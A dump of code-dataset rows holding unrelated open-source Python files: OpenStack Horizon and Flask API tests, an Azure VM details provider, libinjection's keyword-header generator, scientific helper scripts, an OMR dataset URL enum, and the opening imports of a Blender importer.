repo_name (string, 5 to 92 chars) | path (string, 4 to 232 chars) | copies (string, 19 classes) | size (string, 4 to 7 chars) | content (string, 721 to 1.04M chars) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51 to 99.9) | line_max (int64, 15 to 997) | alpha_frac (float64, 0.25 to 0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
m3z/HT | openstack_dashboard/dashboards/admin/instances/tests.py | 1 | 6158 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django import http
from django.core.urlresolvers import reverse
from django.utils.datastructures import SortedDict
from mox import IsA
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
class InstanceViewTest(test.BaseAdminViewTests):
    @test.create_stubs({api.nova: ('flavor_list', 'server_list',),
                        api.keystone: ('tenant_list',)})
    def test_index(self):
        servers = self.servers.list()
        flavors = self.flavors.list()
        tenants = self.tenants.list()
        api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
            AndReturn(tenants)
        api.nova.server_list(IsA(http.HttpRequest),
                             all_tenants=True).AndReturn(servers)
        api.nova.flavor_list(IsA(http.HttpRequest)).AndReturn(flavors)
        self.mox.ReplayAll()

        res = self.client.get(reverse('horizon:admin:instances:index'))
        self.assertTemplateUsed(res, 'admin/instances/index.html')
        instances = res.context['table'].data
        self.assertItemsEqual(instances, servers)

    @test.create_stubs({api.nova: ('flavor_list', 'flavor_get',
                                   'server_list',),
                        api.keystone: ('tenant_list',)})
    def test_index_flavor_list_exception(self):
        servers = self.servers.list()
        tenants = self.tenants.list()
        flavors = self.flavors.list()
        full_flavors = SortedDict([(f.id, f) for f in flavors])
        api.nova.server_list(IsA(http.HttpRequest),
                             all_tenants=True).AndReturn(servers)
        api.nova.flavor_list(IsA(http.HttpRequest)). \
            AndRaise(self.exceptions.nova)
        api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
            AndReturn(tenants)
        for server in servers:
            api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
                AndReturn(full_flavors[server.flavor["id"]])
        self.mox.ReplayAll()

        res = self.client.get(reverse('horizon:admin:instances:index'))
        self.assertTemplateUsed(res, 'admin/instances/index.html')
        instances = res.context['table'].data
        self.assertItemsEqual(instances, servers)

    @test.create_stubs({api.nova: ('flavor_list', 'flavor_get',
                                   'server_list',),
                        api.keystone: ('tenant_list',)})
    def test_index_flavor_get_exception(self):
        servers = self.servers.list()
        flavors = self.flavors.list()
        tenants = self.tenants.list()
        max_id = max([int(flavor.id) for flavor in flavors])
        for server in servers:
            max_id += 1
            server.flavor["id"] = max_id
        api.nova.server_list(IsA(http.HttpRequest),
                             all_tenants=True).AndReturn(servers)
        api.nova.flavor_list(IsA(http.HttpRequest)). \
            AndReturn(flavors)
        api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
            AndReturn(tenants)
        for server in servers:
            api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
                AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()

        res = self.client.get(reverse('horizon:admin:instances:index'))
        instances = res.context['table'].data
        self.assertTemplateUsed(res, 'admin/instances/index.html')
        self.assertMessageCount(res, error=len(servers))
        self.assertItemsEqual(instances, servers)

    @test.create_stubs({api.nova: ('server_list',)})
    def test_index_server_list_exception(self):
        api.nova.server_list(IsA(http.HttpRequest),
                             all_tenants=True).AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()

        res = self.client.get(reverse('horizon:admin:instances:index'))
        self.assertTemplateUsed(res, 'admin/instances/index.html')
        self.assertEqual(len(res.context['instances_table'].data), 0)

    @test.create_stubs({api: ('server_get', 'flavor_get',),
                        api.keystone: ('tenant_get',)})
    def test_ajax_loading_instances(self):
        server = self.servers.first()
        flavor = self.flavors.list()[0]
        tenant = self.tenants.list()[0]

        api.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.flavor_get(IsA(http.HttpRequest),
                       server.flavor['id']).AndReturn(flavor)
        api.keystone.tenant_get(IsA(http.HttpRequest),
                                server.tenant_id,
                                admin=True).AndReturn(tenant)
        self.mox.ReplayAll()

        url = reverse('horizon:admin:instances:index') + \
              "?action=row_update&table=instances&obj_id=" + server.id
        res = self.client.get(url, {},
                              HTTP_X_REQUESTED_WITH='XMLHttpRequest')

        self.assertTemplateUsed(res, "horizon/common/_data_table_row.html")
        self.assertContains(res, "test_tenant", 1, 200)
        self.assertContains(res, "instance-host", 1, 200)
        self.assertContains(res, "server_1", 1, 200)
        self.assertContains(res, "10.0.0.1", 1, 200)
        self.assertContains(res, "512MB RAM | 1 VCPU | 0 Disk", 1, 200)
        self.assertContains(res, "Active", 1, 200)
        self.assertContains(res, "Running", 1, 200)
| apache-2.0 | -3,204,556,978,701,150,700 | 42.985714 | 78 | 0.603118 | false |
QualiSystems/Azure-Shell | package/cloudshell/cp/azure/domain/common/vm_details_provider.py | 1 | 5896 | from azure.mgmt.compute.models import StorageAccountTypes
from cloudshell.cp.core.models import VmDetailsProperty, VmDetailsData, VmDetailsNetworkInterface
from cloudshell.cp.azure.domain.vm_management.operations.deploy_operation import get_ip_from_interface_name
class VmDetailsProvider(object):
def __init__(self, network_service, resource_id_parser):
"""
:param cloudshell.cp.azure.domain.services.network_service.NetworkService network_service:
:param AzureResourceIdParser resource_id_parser:
:return:
"""
self.network_service = network_service
self.resource_id_parser = resource_id_parser
def create(self, instance, is_market_place, logger, network_client, group_name):
"""
:param group_name:
:param network_client:
:param instance: azure.mgmt.compute.models.VirtualMachine
:param is_market_place: bool
:param logging.Logger logger:
:return:
"""
vm_instance_data = None
vm_network_data = None
if is_market_place:
vm_instance_data = self._get_vm_instance_data_for_market_place(instance)
vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger)
logger.info("VM {} was created via market place.".format(instance.name))
else:
vm_instance_data = self._get_vm_instance_data_for_custom_image(instance)
vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger)
logger.info("VM {} was created via custom image.".format(instance.name))
return VmDetailsData(vmInstanceData=vm_instance_data, vmNetworkData=vm_network_data)
@staticmethod
def _get_vm_instance_data_for_market_place(instance):
data = [
VmDetailsProperty(key='Image Publisher',value= instance.storage_profile.image_reference.publisher),
VmDetailsProperty(key='Image Offer',value= instance.storage_profile.image_reference.offer),
VmDetailsProperty(key='Image SKU',value= instance.storage_profile.image_reference.sku),
VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size),
VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name),
VmDetailsProperty(key='Disk Type',value=
'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD')
]
return data
def _get_vm_instance_data_for_custom_image(self, instance):
image_name = self.resource_id_parser.get_image_name(resource_id=instance.storage_profile.image_reference.id)
resource_group = self.resource_id_parser.get_resource_group_name(resource_id=instance.storage_profile.image_reference.id)
data = [
VmDetailsProperty(key='Image',value= image_name),
VmDetailsProperty(key='Image Resource Group',value= resource_group),
VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size),
VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name),
VmDetailsProperty(key='Disk Type',value=
'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD')
]
return data
def _get_vm_network_data(self, instance, network_client, group_name, logger):
network_interface_objects = []
for network_interface in instance.network_profile.network_interfaces:
nic_name = self.resource_id_parser.get_name_from_resource_id(network_interface.id)
nic = network_client.network_interfaces.get(group_name, nic_name)
ip_configuration = nic.ip_configurations[0]
private_ip = ip_configuration.private_ip_address
public_ip = ''
network_data = [VmDetailsProperty(key="IP", value=ip_configuration.private_ip_address)]
subnet_name = ip_configuration.subnet.id.split('/')[-1]
current_interface = VmDetailsNetworkInterface(interfaceId=nic.resource_guid,
networkId=subnet_name,
isPrimary=nic.primary,
networkData=network_data,
privateIpAddress=private_ip,
publicIpAddress=public_ip)
if ip_configuration.public_ip_address:
public_ip_name = get_ip_from_interface_name(nic_name)
public_ip_object = self.network_service.get_public_ip(network_client=network_client,
group_name=group_name,
ip_name=public_ip_name)
public_ip = public_ip_object.ip_address
network_data.append(VmDetailsProperty(key="Public IP", value=public_ip))
network_data.append(
VmDetailsProperty(key="Public IP Type", value=public_ip_object.public_ip_allocation_method))
# logger.info("VM {} was created with public IP '{}'.".format(instance.name,
# ip_configuration.public_ip_address.ip_address))
logger.info("VM {} was created with public IP '{}'.".format(instance.name, public_ip))
network_data.append(VmDetailsProperty(key="MAC Address", value=nic.mac_address))
network_interface_objects.append(current_interface)
return network_interface_objects | apache-2.0 | 8,312,419,053,083,852,000 | 53.100917 | 150 | 0.61652 | false |
fengjian/libinjection | src/sqlparse2c.py | 3 | 3800 | #!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# [email protected]
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
import sys
def toc(obj):
""" main routine """
print """
#ifndef LIBINJECTION_SQLI_DATA_H
#define LIBINJECTION_SQLI_DATA_H
#include "libinjection.h"
#include "libinjection_sqli.h"
typedef struct {
const char *word;
char type;
} keyword_t;
static size_t parse_money(sfilter * sf);
static size_t parse_other(sfilter * sf);
static size_t parse_white(sfilter * sf);
static size_t parse_operator1(sfilter *sf);
static size_t parse_char(sfilter *sf);
static size_t parse_hash(sfilter *sf);
static size_t parse_dash(sfilter *sf);
static size_t parse_slash(sfilter *sf);
static size_t parse_backslash(sfilter * sf);
static size_t parse_operator2(sfilter *sf);
static size_t parse_string(sfilter *sf);
static size_t parse_word(sfilter * sf);
static size_t parse_var(sfilter * sf);
static size_t parse_number(sfilter * sf);
static size_t parse_tick(sfilter * sf);
static size_t parse_ustring(sfilter * sf);
static size_t parse_qstring(sfilter * sf);
static size_t parse_nqstring(sfilter * sf);
static size_t parse_xstring(sfilter * sf);
static size_t parse_bstring(sfilter * sf);
static size_t parse_estring(sfilter * sf);
static size_t parse_bword(sfilter * sf);
"""
#
# Mapping of character to function
#
fnmap = {
'CHAR_WORD' : 'parse_word',
'CHAR_WHITE': 'parse_white',
'CHAR_OP1' : 'parse_operator1',
'CHAR_UNARY': 'parse_operator1',
'CHAR_OP2' : 'parse_operator2',
'CHAR_BANG' : 'parse_operator2',
'CHAR_BACK' : 'parse_backslash',
'CHAR_DASH' : 'parse_dash',
'CHAR_STR' : 'parse_string',
'CHAR_HASH' : 'parse_hash',
'CHAR_NUM' : 'parse_number',
'CHAR_SLASH': 'parse_slash',
'CHAR_SEMICOLON' : 'parse_char',
'CHAR_COMMA': 'parse_char',
'CHAR_LEFTPARENS': 'parse_char',
'CHAR_RIGHTPARENS': 'parse_char',
'CHAR_LEFTBRACE': 'parse_char',
'CHAR_RIGHTBRACE': 'parse_char',
'CHAR_VAR' : 'parse_var',
'CHAR_OTHER': 'parse_other',
'CHAR_MONEY': 'parse_money',
'CHAR_TICK' : 'parse_tick',
'CHAR_UNDERSCORE': 'parse_underscore',
'CHAR_USTRING' : 'parse_ustring',
'CHAR_QSTRING' : 'parse_qstring',
'CHAR_NQSTRING' : 'parse_nqstring',
'CHAR_XSTRING' : 'parse_xstring',
'CHAR_BSTRING' : 'parse_bstring',
'CHAR_ESTRING' : 'parse_estring',
'CHAR_BWORD' : 'parse_bword'
}
print
print "typedef size_t (*pt2Function)(sfilter *sf);"
print "static const pt2Function char_parse_map[] = {"
pos = 0
for character in obj['charmap']:
print " &%s, /* %d */" % (fnmap[character], pos)
pos += 1
print "};"
print
# keywords
# load them
keywords = obj['keywords']
for fingerprint in list(obj[u'fingerprints']):
fingerprint = '0' + fingerprint.upper()
keywords[fingerprint] = 'F'
needhelp = []
for key in keywords.iterkeys():
if key != key.upper():
needhelp.append(key)
for key in needhelp:
tmpv = keywords[key]
del keywords[key]
keywords[key.upper()] = tmpv
print "static const keyword_t sql_keywords[] = {"
for k in sorted(keywords.keys()):
if len(k) > 31:
sys.stderr.write("ERROR: keyword greater than 32 chars\n")
sys.exit(1)
print " {\"%s\", '%s'}," % (k, keywords[k])
print "};"
print "static const size_t sql_keywords_sz = %d;" % (len(keywords), )
print "#endif"
return 0
if __name__ == '__main__':
import json
sys.exit(toc(json.load(sys.stdin)))
| bsd-3-clause | -4,710,446,708,618,401,000 | 27.787879 | 73 | 0.604211 | false |
inconvergent/differential-cloud | modules/helpers.py | 1 | 1866 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
def get_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--procs',
type=int,
default=4,
help='number of processors.'
)
parser.add_argument(
'--nearl',
type=float,
default=0.003
)
parser.add_argument(
'--midl',
type=float,
default=0.008
)
parser.add_argument(
'--farl',
type=float,
default=0.05
)
parser.add_argument(
'--stp',
type=float,
default=1.0e-7
)
parser.add_argument(
'--reject',
type=float,
default=1.0
)
parser.add_argument(
'--attract',
type=float,
default=0.3
)
parser.add_argument(
'--nmax',
type=int,
default=1000000
)
parser.add_argument(
'--itt',
type=int,
default=10000000000
)
parser.add_argument(
'--vnum',
type=int,
default=10000000000
)
parser.add_argument(
'--stat',
type=int,
default=100
)
parser.add_argument(
'--export',
type=int,
default=1000
)
parser.add_argument(
'--out',
type=str,
default='./res/res'
)
parser.add_argument(
'--startRad',
type=float,
default=0.01
)
parser.add_argument(
'--startNum',
type=int,
default=100
)
return parser.parse_args()
def make_info_str(args):
s = ''
for k in vars(args):
s += '# ' + str(k) + ': ' + str(getattr(args,k)) + '\n'
return s
def print_stats(steps,dm, meta=False):
from time import strftime
from time import time
if isinstance(meta, str):
meta = ' | {:s}'.format(meta)
else:
meta = ''
print(
'{:s} | stp: {:d} sec: {:.2f} v: {:d}{:s}'
.format(
strftime('%d/%m/%y %H:%M:%S'),
steps,
time()-dm.get_start_time(),
dm.get_vnum(),
meta
)
)
return
| mit | -6,956,966,956,868,832,000 | 14.55 | 59 | 0.546088 | false |
SpaceHotDog/Flask_API | test_bucketlist.py | 1 | 3171 | # test_bucketlist.py
import unittest
import os
import json
from app import create_app, db
class BucketlistTestCase(unittest.TestCase):
"""This class represents the bucketlist test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.bucketlist = {'name': 'Go to Borabora for vacation'}
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
def test_bucketlist_creation(self):
"""Test API can create a bucketlist (POST request)"""
res = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(res.status_code, 201)
self.assertIn('Go to Borabora', str(res.data))
def test_api_can_get_all_bucketlists(self):
"""Test API can get a bucketlist (GET request)."""
res = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(res.status_code, 201)
res = self.client().get('/bucketlists/')
self.assertEqual(res.status_code, 200)
self.assertIn('Go to Borabora', str(res.data))
def test_api_can_get_bucketlist_by_id(self):
"""Test API can get a single bucketlist by using it's id."""
rv = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(rv.status_code, 201)
result_in_json = json.loads(rv.data.decode('utf-8').replace("'", "\""))
result = self.client().get(
'/bucketlists/{}'.format(result_in_json['id']))
self.assertEqual(result.status_code, 200)
self.assertIn('Go to Borabora', str(result.data))
def test_bucketlist_can_be_edited(self):
"""Test API can edit an existing bucketlist. (PUT request)"""
rv = self.client().post(
'/bucketlists/',
data={'name': 'Eat, pray and love'})
self.assertEqual(rv.status_code, 201)
rv = self.client().put(
'/bucketlists/1',
data={
"name": "Dont just eat, but also pray and love :-)"
})
self.assertEqual(rv.status_code, 200)
results = self.client().get('/bucketlists/1')
self.assertIn('Dont just eat', str(results.data))
def test_bucketlist_deletion(self):
"""Test API can delete an existing bucketlist. (DELETE request)."""
rv = self.client().post(
'/bucketlists/',
data={'name': 'Eat, pray and love'})
self.assertEqual(rv.status_code, 201)
res = self.client().delete('/bucketlists/1')
self.assertEqual(res.status_code, 200)
# Test to see if it exists, should return a 404
result = self.client().get('/bucketlists/1')
self.assertEqual(result.status_code, 404)
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| unlicense | -8,130,678,617,017,852,000 | 37.670732 | 79 | 0.600442 | false |
apacha/OMR-Datasets | omrdatasettools/OmrDataset.py | 1 | 11026 | from enum import Enum, auto
from typing import Dict
class OmrDataset(Enum):
"""
The available OMR datasets that can be automatically downloaded with Downloader.py
"""
#: The Audiveris OMR dataset from https://github.com/Audiveris/omr-dataset-tools, Copyright 2017 by Hervé Bitteur under AGPL-3.0 license
Audiveris = auto()
#: The Baro Single Stave dataset from http://www.cvc.uab.es/people/abaro/datasets.html, Copyright 2019 Arnau Baró, Pau Riba, Jorge Calvo-Zaragoza, and Alicia Fornés under CC-BY-NC-SA 4.0 license
Baro = auto()
#: The Capitan dataset from http://grfia.dlsi.ua.es/, License unspecified, free for research purposes
Capitan = auto()
#: Custom version of the CVC-MUSCIMA dataset that contains all images in grayscale, binary and with the
#: following staff-line augmentations: interrupted, kanungo, thickness-variation-v1/2, y-variation-v1/2
#: typeset-emulation and whitespeckles. (all data augmentations that could be aligned automatically).
#: The grayscale images are different from the WriterIdentification dataset, in such a way, that they were aligned
#: to the images from the Staff-Removal dataset. This is the recommended dataset for object detection, as the
#: MUSCIMA++ annotations can be used with a variety of underlying images.
#: See https://github.com/apacha/CVC-MUSCIMA to learn more.
CvcMuscima_MultiConditionAligned = auto()
#: The larger version of the CVC-MUSCIMA dataset for staff removal in black and white with augmentations
#: from http://www.cvc.uab.es/cvcmuscima/index_database.html,
#: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license
CvcMuscima_StaffRemoval = auto()
#: The smaller version of the CVC-MUSCIMA dataset for writer identification in grayscale
#: from http://www.cvc.uab.es/cvcmuscima/index_database.html,
#: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license
CvcMuscima_WriterIdentification = auto()
#: Edirom dataset. All rights reserved
Edirom_Bargheer = auto()
#: Edirom datasets on Freischuetz from https://freischuetz-digital.de/edition.html. All rights reserved.
Edirom_FreischuetzDigital = auto()
#: The Fornes Music Symbols dataset from http://www.cvc.uab.es/~afornes/, License unspecified - citation requested
Fornes = auto()
#: The official HOMUS dataset from http://grfia.dlsi.ua.es/homus/, License unspecified.
Homus_V1 = auto()
#: The improved version of the HOMUS dataset with several bugs-fixed from https://github.com/apacha/Homus
Homus_V2 = auto()
#: The MUSCIMA++ dataset from https://ufal.mff.cuni.cz/muscima, Copyright 2017 Jan Hajic jr. under CC-BY-NC-SA 4.0 license
MuscimaPlusPlus_V1 = auto()
#: The second version of the MUSCIMA++ dataset from https://github.com/OMR-Research/muscima-pp
MuscimaPlusPlus_V2 = auto()
#: A sub-set of the MUSCIMA++ annotations that contains bounding-box annotations for staves, staff measures and system measures. It was semi-automatically constructed from existing annotations and manually verified for correctness. The annotations are available in a plain JSON format as well as in the COCO format.
MuscimaPlusPlus_MeasureAnnotations = auto()
#: The OpenOMR Symbols dataset from https://sourceforge.net/projects/openomr/, Copyright 2013 by Arnaud F. Desaedeleer under GPL license
OpenOmr = auto()
#: The Printed Music Symbols dataset from https://github.com/apacha/PrintedMusicSymbolsDataset, Copyright 2017 by Alexander Pacha under MIT license
Printed = auto()
#: The Rebelo dataset (part 1) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license
Rebelo1 = auto()
#: The Rebelo dataset (part 2) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license
Rebelo2 = auto()
#: The DeepScore dataset (version 1) with extended vocabulary from https://tuggeluk.github.io/downloads/, License unspecified.
DeepScores_V1_Extended = auto()
#: The AudioLabs v1 dataset (aka. Measure Bounding Box Annotation) from https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures, Copyright 2019 by Frank Zalkow, Angel Villar Corrales, TJ Tsai, Vlora Arifi-Müller, and Meinard Müller under CC BY-NC-SA 4.0 license
AudioLabs_v1 = auto()
#: The AudioLabs v2 dataset, enhanced with staves, staff measures and the original system measures. The annotations are available in csv, JSON and COCO format.
AudioLabs_v2 = auto()
#: The Accidentals detection dataset by Kwon-Young Choi from https://www-intuidoc.irisa.fr/en/choi_accidentals/, License unspecified.
ChoiAccidentals = auto()
def get_dataset_download_url(self) -> str:
""" Returns the url of the selected dataset.
Example usage: OmrDataset.Fornes.get_dataset_download_url() """
return self.dataset_download_urls()[self.name]
def get_dataset_filename(self) -> str:
""" Returns the name of the downloaded zip file of a dataset.
Example usage: OmrDataset.Fornes.get_dataset_filename() """
return self.dataset_file_names()[self.name]
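# Illustrative sketch (added commentary, not part of the original source): assuming
# the release URLs above remain reachable, the two accessors combine with plain
# urllib, e.g.
#   from urllib.request import urlretrieve
#   ds = OmrDataset.Fornes
#   urlretrieve(ds.get_dataset_download_url(), ds.get_dataset_filename())
# The project itself ships a Downloader (see the class docstring) that wraps this
# step; the snippet only shows how the two helpers fit together.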
def dataset_download_urls(self) -> Dict[str, str]:
""" Returns a mapping with all URLs, mapped from their enum keys """
return {
# Official URL: https://github.com/Audiveris/omr-dataset-tools/tree/master/data/input-images
"Audiveris": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudiverisOmrDataset.zip",
# Official URL: http://www.cvc.uab.es/people/abaro/datasets/MUSCIMA_ABARO.zip
"Baro": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BaroMuscima.zip",
# Official URL: http://grfia.dlsi.ua.es/cm/projects/timul/databases/BimodalHandwrittenSymbols.zip
"Capitan": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BimodalHandwrittenSymbols.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_WI.zip
"CvcMuscima_WriterIdentification": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_WI.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_SR.zip
"CvcMuscima_StaffRemoval": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_SR.zip",
# Official URL: https://github.com/apacha/CVC-MUSCIMA
"CvcMuscima_MultiConditionAligned": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_MCA.zip",
"Edirom_Bargheer": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Bargheer.zip",
"Edirom_FreischuetzDigital": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/FreischuetzDigital.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/datasets/Music_Symbols.zip
"Fornes": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Music_Symbols.zip",
# Official URL: http://grfia.dlsi.ua.es/homus/HOMUS.zip
"Homus_V1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS.zip",
# Official URL: https://github.com/apacha/Homus
"Homus_V2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS-2.0.zip",
# Official URL: https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11372/LRT-2372/MUSCIMA-pp_v1.0.zip?sequence=1&isAllowed=y
"MuscimaPlusPlus_V1": "https://github.com/OMR-Research/muscima-pp/releases/download/v1.0/MUSCIMA-pp_v1.0.zip",
# Official URL: https://github.com/OMR-Research/muscima-pp
"MuscimaPlusPlus_V2": "https://github.com/OMR-Research/muscima-pp/releases/download/v2.0/MUSCIMA-pp_v2.0.zip",
"MuscimaPlusPlus_Images": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVC_MUSCIMA_PP_Annotated-Images.zip",
"MuscimaPlusPlus_MeasureAnnotations": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/MUSCIMA-pp_v1.0-measure-annotations.zip",
# Official URL: https://sourceforge.net/projects/openomr/
"OpenOmr": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/OpenOMR-Dataset.zip",
"Printed": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/PrintedMusicSymbolsDataset.zip",
"Rebelo1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset1.zip",
"Rebelo2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset2.zip",
"DeepScores_V1_Extended": "https://repository.cloudlab.zhaw.ch/artifactory/deepscores/ds_extended.zip",
# Official URL: https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures
"AudioLabs_v1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v1.zip",
"AudioLabs_v2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v2.zip",
# Official URL: https://www-intuidoc.irisa.fr/en/choi_accidentals/
"ChoiAccidentals": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/choi_accidentals_dataset.zip"
}
def dataset_file_names(self) -> Dict[str, str]:
""" Returns a map of all file_names, mapped from their enum keys """
return {
"Audiveris": "AudiverisOmrDataset.zip",
"Baro": "BaroMuscima.zip",
"Capitan": "BimodalHandwrittenSymbols.zip",
"CvcMuscima_WriterIdentification": "CVCMUSCIMA_WI.zip",
"CvcMuscima_StaffRemoval": "CVCMUSCIMA_SR.zip",
"CvcMuscima_MultiConditionAligned": "CVCMUSCIMA_MCA.zip",
"Edirom_Bargheer": "Bargheer.zip",
"Edirom_FreischuetzDigital": "FreischuetzDigital.zip",
"Fornes": "Music_Symbols.zip",
"Homus_V1": "HOMUS.zip",
"Homus_V2": "HOMUS-2.0.zip",
"MuscimaPlusPlus_V1": "MUSCIMA-pp_v1.0.zip",
"MuscimaPlusPlus_V2": "MUSCIMA-pp_v2.0.zip",
"MuscimaPlusPlus_Images": "CVC_MUSCIMA_PP_Annotated-Images.zip",
"MuscimaPlusPlus_MeasureAnnotations": "MUSCIMA-pp_v1.0-measure-annotations.zip",
"OpenOmr": "OpenOMR-Dataset.zip",
"Printed": "PrintedMusicSymbolsDataset.zip",
"Rebelo1": "Rebelo-Music-Symbol-Dataset1.zip",
"Rebelo2": "Rebelo-Music-Symbol-Dataset2.zip",
"DeepScores_V1_Extended": "ds_extended.zip",
"AudioLabs_v1": "AudioLabs_v1.zip",
"AudioLabs_v2": "AudioLabs_v2.zip",
"ChoiAccidentals": "choi_accidentals_dataset.zip"
}
| mit | -4,851,323,977,944,946,000 | 58.551351 | 319 | 0.699737 | false |
khrapovs/datastorage | datastorage/compustat.py | 1 | 2589 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Short interest dynamics
"""
from __future__ import print_function, division
import os
import zipfile
import datetime as dt
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
path = os.getenv("HOME") + '/Dropbox/Research/data/Compustat/data/'
# __location__ = os.path.realpath(os.path.join(os.getcwd(),
# os.path.dirname(__file__)))
# path = os.path.join(__location__, path + 'Compustat/data/')
def date_convert(string):
    return dt.datetime.strptime(string, '%d-%m-%Y')


def import_data():
    """Import data and save it to the disk.
    """
    zf = zipfile.ZipFile(path + 'short_int.zip', 'r')
    name = zf.namelist()[0]
    short_int = pd.read_csv(zf.open(name),
                            converters={'datadate': date_convert})
    columns = {'datadate': 'date',
               'SHORTINTADJ': 'short_int',
               'GVKEY': 'gvkey'}
    short_int.rename(columns=columns, inplace=True)
    short_int.set_index(['gvkey', 'date'], inplace=True)
    short_int.sort_index(inplace=True)
    short_int.to_hdf(path + 'short_int.h5', key='short_int')

    print(short_int.head())
    print(short_int.dtypes)
    print('Number of unique companies: ',
          short_int.index.get_level_values('gvkey').nunique())
    print('Number of unique dates: ',
          short_int.index.get_level_values('date').nunique())
    print('Min and Max date: ',
          short_int.index.get_level_values('date').min().date(), ',',
          short_int.index.get_level_values('date').max().date())


def load_data():
    """Load data from disk and check for sanity.
    """
    return pd.read_hdf(path + 'short_int.h5', 'short_int')


def count_companies(short_int):
    """Plot number of companies over time.
    """
    df = short_int.reset_index().groupby('date')['gvkey'].nunique()
    sns.set_context('paper')
    df.plot(figsize=(10, 3))
    plt.show()
    data = df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)]
    data.plot(figsize=(10, 3))
    plt.show()


def mean_short_int(short_int):
    """Mean short interest on each date.
    """
    df = short_int.groupby(level='date')['short_int'].mean()
    sns.set_context('paper')
    df.plot(figsize=(10, 3))
    plt.show()
    df.ix[:dt.date(2004, 12, 31)].plot(figsize=(10, 3))
    plt.show()
    df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)].plot(figsize=(10, 3))
    plt.show()


if __name__ == '__main__':
    import_data()
    short_int = load_data()
    count_companies(short_int)
    mean_short_int(short_int)
| mit | 2,111,269,302,578,816,300 | 24.382353 | 73 | 0.596756 | false |
Yethiel/re-volt-addon | io_revolt/parameters_in.py | 1 | 4567 | """
Name: parameters_in
Purpose: Importing cars using the parameters.txt file
Description:
Imports entire cars using the carinfo module.
"""
if "bpy" in locals():
import imp
imp.reload(common)
imp.reload(carinfo)
imp.reload(prm_in)
import os
import bpy
import bmesh
